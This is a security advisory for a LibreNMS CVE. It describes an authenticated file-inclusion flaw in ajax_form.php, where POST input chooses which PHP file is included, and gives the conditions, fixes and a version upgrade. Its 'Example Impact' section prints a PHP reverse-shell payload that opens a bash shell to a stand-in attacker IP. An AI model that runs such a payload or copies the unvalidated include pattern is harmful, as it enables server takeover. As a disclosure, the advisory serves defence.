CVE-2025-54138: LibreNMS has Authenticated Local File Inclusion in ajax_form.php that Allows RCE
LibreNMS 25.6.0 contains an architectural vulnerability in the ajaxform.php endpoint that permits Remote File Inclusion based on user-controlled POST input.
The application directly uses the type parameter to dynamically include .inc.php files from the trusted path includes/html/forms/, without validation or allowlisting:
php if (fileexists('includes/html/forms/' . $POST['type'] . '.inc.php')) { includeonce 'includes/html/forms/' . $POST['type'] . '.inc.php'; } This pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path — for example, via symlink, development misconfiguration, or chained vulnerabilities.
> This is not an arbitrary file upload bug. But it does provide a powerful execution sink for attackers with write access (direct or indirect) to the include directory.
Conditions for Exploitation
- Attacker must be authenticated - Attacker must control a file at includes/html/forms/{type}.inc.php (or symlink)
Example Impact (RCE)
If a PHP file or symlinked shell is staged in the include path, an attacker can achieve full remote code execution under the librenms user context:
php <?php system('/bin/bash -c "bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1"'); ?> https://github.com/user-attachments/assets/deb9ccd2-101c-4172-89b1-b840b7ed3812
---
Recommended Fix
- Implement strict allow listing or hardcoded routing instead of dynamically including user-supplied filenames. - Avoid passing raw POST input into includeonce. - Ensure the inclusion path is immutable and outside attacker control (e.g., avoid variable expansion into trusted paths).
Other sources
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring which includes support for a wide range of network hardware and operating systems. LibreNMS versions 25.6.0 and below contain an architectural vulnerability in the ajaxform.php endpoint that permits Remote File Inclusion based on user-controlled POST input. The application directly uses the type parameter to dynamically include .inc.php files from the trusted path includes/html/forms/, without validation or allowlisting. This pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path — for example, via symlink, development misconfiguration, or chained vulnerabilities. This is fixed in version 25.7.0.
— MITRE
Affected Software
Remediation
Event History
Frequently Asked Questions
What is the severity of CVE-2025-54138?
CVE-2025-54138 has a critical severity rating due to its potential for Local File Inclusion exploitation.
How do I fix CVE-2025-54138?
To fix CVE-2025-54138, you should upgrade LibreNMS to version 25.7.0 or later.
What exploit does CVE-2025-54138 enable?
CVE-2025-54138 enables attackers to execute Local File Inclusion attacks via user-controlled POST input.
Which versions of LibreNMS are affected by CVE-2025-54138?
CVE-2025-54138 affects LibreNMS versions prior to 25.7.0.
Where can I learn more about CVE-2025-54138?
For more details about CVE-2025-54138, refer to the security advisories provided by LibreNMS.